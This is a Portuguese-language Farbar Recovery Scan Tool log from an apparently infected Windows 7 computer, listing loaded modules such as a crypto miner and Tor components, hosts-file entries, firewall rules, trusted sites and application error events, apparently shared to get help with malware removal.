ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%

==================== Módulos Carregados (Whitelisted) ==============

2015-12-26 12:09 - 2011-04-13 23:41 - 000034304 _____ () C:\Windows\System32\ssb3ml6.dll
2015-12-18 12:43 - 2015-03-11 23:43 - 000022528 _____ () C:\Windows\System32\ux003lm.dll
2018-06-05 05:50 - 2018-06-05 05:50 - 001864224 _____ () C:\Program Files\5850f7899b7a00e77740675180ff5f97\eafeb516191690959119ed8371b79fca.exe
2018-06-05 22:11 - 2018-06-05 21:39 - 003780096 _____ () C:\ProgramData\Logic Cramble\set.exe
2018-06-05 22:06 - 2018-06-06 02:37 - 000043520 _____ () C:\ProgramData\PrefsSecure\Nettrans.exe
2013-10-17 14:27 - 2013-10-17 14:27 - 000166912 _____ () C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
2015-12-18 12:43 - 2015-12-18 12:43 - 000143664 ____N () C:\Windows\SysWOW64\SecUPDUtilSvc.exe
2016-10-25 08:57 - 2016-10-25 08:57 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2018-06-05 22:11 - 2018-03-24 14:51 - 002990080 _____ () C:\Windows\system32\mcicda64.dll
2017-03-31 01:01 - 2017-03-31 01:01 - 001049744 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherEntryDll.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 003630080 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\tor.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 001593344 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\obfs4proxy.exe
2017-03-31 01:01 - 2017-03-31 01:01 - 000149136 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherService.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 001435136 ____H () C:\Windows\windefender.exe
2018-06-05 22:12 - 2018-06-06 07:48 - 002064847 _____ () C:\Users\Alessandra\AppData\Local\Temp\xmrig.exe
2015-12-18 09:55 - 2012-12-20 03:18 - 000094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2018-06-06 07:48 - 2018-06-06 07:48 - 000871424 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-5TP8H.tmp\5rdiqyozohf.tmp
2018-06-06 07:48 - 2018-06-06 07:48 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-S3C6D.tmp\gje1ddkrsb3.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-F31S8.tmp\4w2suwq3kyp.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-QTJFQ.tmp\ydak1uysdro.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-U3PGO.tmp\5dpz20uzgsy.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-RPQ8E.tmp\imjsul3e1mv.tmp
2015-12-26 12:11 - 2010-10-28 07:14 - 000618496 _____ () C:\Windows\Samsung\PanelMgr\SSMMgr.exe
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ2.tmp\1h11oowtwfi.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ1.tmp\30pkxk0pivi.tmp
2015-12-26 12:11 - 2009-11-19 06:15 - 000306688 _____ () C:\Windows\Samsung\PanelMgr\caller64.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 000342528 _____ () C:\ProgramData\Kipolam\Fasehold.dll
2018-05-17 19:48 - 2018-05-15 00:13 - 004443992 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libglesv2.dll
2018-05-17 19:48 - 2018-05-15 00:13 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libegl.dll
2018-06-05 22:09 - 2018-06-05 22:09 - 000959488 _____ () C:\Windows\zmtcxviskgfclpcu.zztcx
2017-09-20 18:56 - 2017-06-15 11:16 - 000061944 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2017-09-20 18:56 - 2017-06-15 11:15 - 000110584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000107520 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\zlib1.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000093095 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\libssp-0.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000717225 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\libevent-2-0-5.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000523022 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\libgcc_s_sjlj-1.dll
2017-03-31 01:01 - 2017-03-31 01:01 - 000575120 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.5000183\Updata.dll
2018-06-06 07:48 - 2018-06-06 07:48 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-2OANT.tmp\_isetup\_isdecmp.dll
2018-06-06 07:48 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-2OANT.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-VLU7I.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-VLU7I.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-GCOT9.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-GCOT9.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-E36CS.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-E36CS.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-RC80F.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-RC80F.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-I24E7.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-I24E7.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-KQBF9.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-KQBF9.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-3D82V.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-3D82V.tmp\itdownload.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000052224 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qoauth_Ad_1.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000742400 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qca_Ad_2.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000195584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson_Ad_0.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000043912 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_MFCMigrationFramework_Ad_2.dll
2017-09-20 18:56 - 2017-06-15 10:49 - 000279976 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\pt-BR\AdWingManRes.dll
2017-09-20 18:56 - 2017-02-14 03:39 - 040640808 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libcef.dll
2017-09-20 18:56 - 2017-02-14 03:39 - 000912384 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libglesv2.dll
2017-09-20 18:56 - 2017-02-14 03:39 - 000134144 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [2410]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)

HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Classes\.scr: AutoCADScriptFile => C:\Windows\system32\notepad.exe "%1"

==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\bb.com.br -> aapj.bb.com.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\caixa.gov.br -> imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\gastecnologia.com.br -> cloud.gastecnologia.com.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2009-07-13 23:34 - 2018-06-05 22:08 - 000001320 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-1322778411-14668823-402750941-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Alessandra\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.15.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==


==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{BEA90970-D349-46E4-B0E0-80C5BA491732}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9E7F4A82-79AD-46EB-8C71-D53A42139996}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BE2BCE29-0A2F-4FC9-947C-A17068EAB249}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{15617914-BFB2-400C-BB50-EA1B27792B99}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{31A06FF5-2487-4820-8C1D-C659D5005BED}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{9CDE5665-1246-4FD6-B557-A66A1DB5A553}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{3685251F-53FB-4795-94F3-198079939570}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F6B8CCAA-737F-4FE7-A32D-AFF6BD0F881E}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Printer Center\SamsungPrinterCenter.exe
FirewallRules: [{C4D91B7B-2B8A-4D71-9E57-D4689C538FD3}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{DF992E6B-904E-42CD-93EF-AD87A517FF1A}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{379FD7F8-9CAA-4D9C-AE1C-C2620CE7AFBA}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9E0B90D5-9FA8-4743-B8DB-3C4F4D20C081}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{25EE7BDB-1D16-4CE2-8358-51D7EFBFC812}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{5034E993-8E90-4E96-B04A-D470477C4CE1}] => (Allow) C:\Windows\twain_32\Samsung\ScanMgr.exe
FirewallRules: [{1EC792B7-D9ED-4AA1-B707-28E23C7298AD}] => (Allow) C:\Windows\twain_32\Samsung\ScanMgr.exe
FirewallRules: [{7AB07B33-D881-4460-AE4C-3437D87898C7}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Scan2Pc.exe
FirewallRules: [{ABA0D127-C410-4FA4-BB17-3E117A0375F0}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Scan2Pc.exe
FirewallRules: [{0989E54B-C060-4C5E-B203-57E269737FA8}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Sscan2io.exe
FirewallRules: [{3C207214-DE19-450B-AEBA-CA7551BDFF04}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Sscan2io.exe
FirewallRules: [{86A0F1FB-7050-476A-93BC-084BF3770D0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D03C25FD-B640-47F4-B6FB-5B85B7E58A35}] => (Allow) C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\USBSetup.exe
FirewallRules: [{C8B8F4AC-3B49-435B-B5BE-AB1545C2B07C}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{D63C6F03-B240-4318-935F-E433031861D4}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{669BC417-C847-499B-A3E7-78043E2287EE}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{037F6CEC-27A4-4CDB-939F-18C6B892D5B7}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{7055916F-01B7-4ACC-A69D-2E03FED72955}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{765CB3C3-711E-45B3-A5DD-BA59A59DDC74}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{D664A33A-F137-4FED-91D7-79FED50B8F93}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_121\bin\javaw.exe
FirewallRules: [UDP Query User{5F9469E6-819B-4FB4-B793-AEE21A90FE25}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_121\bin\javaw.exe
FirewallRules: [{3A459DCF-102F-4443-9DF8-0F494CD87E36}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{C48752F6-3B67-4EC4-82C0-C64CDB16C115}C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe
FirewallRules: [UDP Query User{57C9A482-2A59-4AC8-95AB-2FBB18F87BA9}C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe
FirewallRules: [{F2F7FD9A-2235-4197-A5FB-43C8C685C8C8}] => (Allow) C:\Program Files (x86)\IP-TV Player\IpTvPlayer.exe
FirewallRules: [{042996BC-2C88-4A09-B354-08C222139D1E}] => (Allow) C:\Program Files (x86)\IP-TV Player\IpTvPlayer.exe
FirewallRules: [TCP Query User{70984B4D-22BA-47CD-82E1-7A8D1231DECC}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{53E6EC90-CE6E-48EB-A503-0D03AB279D09}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [{BD032716-E073-4BAB-99BF-599AF925A0A6}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{D8BE75C5-CFCC-4534-BE7A-2EAC7C7ECD73}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [TCP Query User{46CD3E46-E364-423C-A29D-372398906927}C:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) C:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{AA057BEF-0370-46BF-BE45-750AEBA2421C}C:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) C:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{BA785D5C-6ECD-424B-A6A8-DB94A8B15EDA}C:\users\alessandra\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\alessandra\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{D6F19BFF-D35F-4C95-A62B-5BF33F3D8DA5}C:\users\alessandra\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\alessandra\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{EE8DFAA1-4DEB-43D1-B72B-AD8997D2E49C}C:\program files (x86)\pje-office-build\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [UDP Query User{7327BF0E-4608-46FF-954A-C260E1FFCF74}C:\program files (x86)\pje-office-build\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [{422C4623-2D76-4569-BA23-1610B9334AE8}] => (Block) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [{8A15D626-8B07-4F0E-A23D-1BF21A28AC30}] => (Block) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [{87C783D2-7125-499A-B55D-D85401EA9EB2}] => (Block) %ProgramFiles%\Adobe\Adobe Photoshop Lightroom 5.6\lightroom.exe
FirewallRules: [{F306A095-CD15-4CB8-BFDA-BBFCAD041302}] => (Block) %ProgramFiles%\Adobe\Adobe Photoshop Lightroom 5.6\lightroom.exe
FirewallRules: [{6AF840B7-39B2-4944-BF6D-8CF164876470}] => (Block) %USERPROFILE%\Desktop\PhotoshopPortable\PhotoshopCS6Portable.exe
FirewallRules: [{4B5D398A-114E-4354-9DAF-8596A655080B}] => (Block) %USERPROFILE%\Desktop\PhotoshopPortable\PhotoshopCS6Portable.exe
FirewallRules: [TCP Query User{C43BE371-91F9-4AA7-8268-D51BED0B69D5}C:\program files\java\jre1.8.0_171\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_171\bin\javaw.exe
FirewallRules: [UDP Query User{590B7CBA-168E-463E-A553-B1C39C7B3EF2}C:\program files\java\jre1.8.0_171\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_171\bin\javaw.exe
FirewallRules: [{A5206489-E395-456F-B5CD-CACB927F1895}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{364A1AF3-E0CC-4F6B-97C6-2DE3BFFF5426}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{5442A011-126C-4DC3-A208-F44D0A42E2D5}] => (Allow) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{D405D8AA-56DD-4758-8756-00AFBBC3A2F6}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{ADB0C9D7-8F89-44F5-B024-3D80E860CF1C}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E9A0873A-D4B6-4890-B992-8E7EDC2C9641}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AFF38F89-AD1A-400C-8535-690144DAEF29}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A58B4EA9-14E7-4349-A6F2-D4D3181B314E}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{04C0119F-801B-4E2B-8362-F8ED8C09E16F}] => (Allow) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{5741E46A-26F0-4F04-BE63-58ED5B6A92A5}] => (Allow) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{95E3CB2F-08D6-42C3-B34A-77EE0BDE2A79}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{A002F838-55F4-495C-96D6-2D9A9963F603}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{8DDD29D9-CF94-4CD4-B9E5-398C2E9E9AE6}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{FB56CA1B-F12F-4469-946B-863842A847FB}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{23969F5F-F6CC-4040-A753-44FCCF800178}] => (Block) %USERPROFILE%\Desktop\PhotoshopPortable\PhotoshopCS6Portable.exe
FirewallRules: [{3352C429-10E4-4E3A-AB2C-86F38EAB1212}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6B8C9379-2395-46D0-8383-3611268F0B24}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7B7091AC-1909-4C9D-BE3E-CCD19D34DE65}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{6EA3883A-4D47-46A4-8BD8-F2F2E99F72D2}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{BD6AFB05-D4C7-4995-8E08-54097CD9228B}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{EC93336D-700E-4214-8B17-63F362A8DD7F}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{B562EAB9-5616-4486-AB91-161A823B917F}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe

==================== Pontos de Restauração =========================

03-04-2018 06:25:38 Removed Adobe Photoshop Lightroom 5.6 64-bit.
27-04-2018 10:11:15 Windows Update

==================== Dispositivos Apresentando Falhas No Gerenciador =============

Name: Warsaw - Driver (PP)
Description: Warsaw - Driver (PP)
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: wsddpp
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (06/06/2018 08:00:54 AM) (Source: Customer Experience Improvement Program) (EventID: 1006) (User: )
Description: Um problema impediu que os dados do Programa de Aperfeiçoamento da Experiência do Usuário fossem consolidados em arquivos que podem ser enviados para a Microsoft, (Erro 80004005).

Error: (06/06/2018 07:53:36 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (06/06/2018 07:49:44 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: CompMgmtLauncher.exe, versão: 6.1.7600.16385, carimbo de hora: 0x4a5bc7d7
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.17514, carimbo de hora: 0x4ce7c8f9
Código de exceção: 0xc000000d
Deslocamento com falha: 0x000000000007a291
Identificação do processo com falha: 0x2c8
Hora de início do aplicativo com falha: 0x01d3fd840284e0a8
Caminho do aplicativo com falha: C:\Windows\system32\CompMgmtLauncher.exe
FCaminho do módulo de falhas: C:\Windows\SYSTEM32\ntdll.dll
Identificação do Relatório: 5244e966-6977-11e8-adf6-50b7c3c6601c

Error: (06/06/2018 07:46:23 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: desktop66.exe, versão: 1.0.0.11, carimbo de hora: 0x5b029b0f
Nome do módulo de falhas: desktop66.exe, versão: 1.0.0.11, carimbo de hora: 0x5b029b0f
Código de exceção: 0x40000015
Deslocamento com falha: 0x0001579c
Identificação do processo com falha: 0xa94
Hora de início do aplicativo com falha: 0x01d3fd834b73ca52
Caminho do aplicativo com falha: C:\ProgramData\yahoochrome_D\desktop66.exe
FCaminho do módulo de falhas: C:\ProgramData\yahoochrome_D\desktop66.exe
Identificação do Relatório: da5ae4b3-6976-11e8-adf6-50b7c3c6601c

Error: (06/06/2018 07:44:31 AM) (Source: Application Error) (EventID: 1005) (User: )
Description: O Windows não pode acessar o arquivo por um destes motivos: há um problema de conexão com a rede, o disco no qual o arquivo está armazenado ou nos drivers de armazenamento
instalados neste computador, ou o disco está ausente. O Windows fechou o programa C++ I2P daemon por causa desse erro.

Programa: C++ I2P daemon
Arquivo:

O valor do erro está listado na seção Dados Adicionais.
Ação do Usuário
1. Abra o arquivo novamente.
Esta situação pode ser um problema temporário corrigida quando o programa é executado novamente.
2.
Se o arquivo ainda não puder ser acessado e
- não estiver na rede,
o administrador da rede deverá verificar se não há um problema com a rede e se o servidor puder ser contatado.
- Está em um disco removível, por exemplo, um disquete ou CD-ROM, verifique se o disco está completamente inserido no computador.
3. Verifique e repare o sistema de arquivos ao executar CHKDSK. Para executar CHKDSK, clique em Iniciar, clique em Executar, digite CMD e clique em OK. No prompt de comando, digite CHKDSK /F e pressione ENTER.
4. Se o problema persistir, restaure o arquivo de uma cópia de backup.
5. Determine se outros arquivos no mesmo disco podem ser abertos. Em caso negativo, o disco pode estar danificado. Se for um disco rígido, contate o administrador ou o fornecedor de hardware do computador para
obter assistência adicional.

Dados Adicionais
Valor do erro: 00000000
Tipo de disco: 0

Error: (06/06/2018 07:44:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: i2pd.exe, versão: 2.18.0.0, carimbo de hora: 0x5a70a377
Nome do módulo de falhas: i2pd.exe, versão: 2.18.0.0, carimbo de hora: 0x5a70a377
Código de exceção: 0xc000001d
Deslocamento com falha: 0x0002b47a
Identificação do processo com falha: 0x8c0
Hora de início do aplicativo com falha: 0x01d3fd8347091caf
Caminho do aplicativo com falha: C:\Users\Alessandra\AppData\Local\Temp\csrss\i2pd\i2pd.exe
FCaminho do módulo de falhas: C:\Users\Alessandra\AppData\Local\Temp\csrss\i2pd\i2pd.exe
Identificação do Relatório: 97c0638a-6976-11e8-adf6-50b7c3c6601c

Error: (06/05/2018 10:55:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: Explorer.EXE, versão: 6.1.7601.17514, carimbo de hora: 0x4ce7a144
Nome do módulo de falhas: mso.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x5641bec7
Código de exceção: 0xc0000005
Deslocamento com falha: 0x000007fef00aeb5c
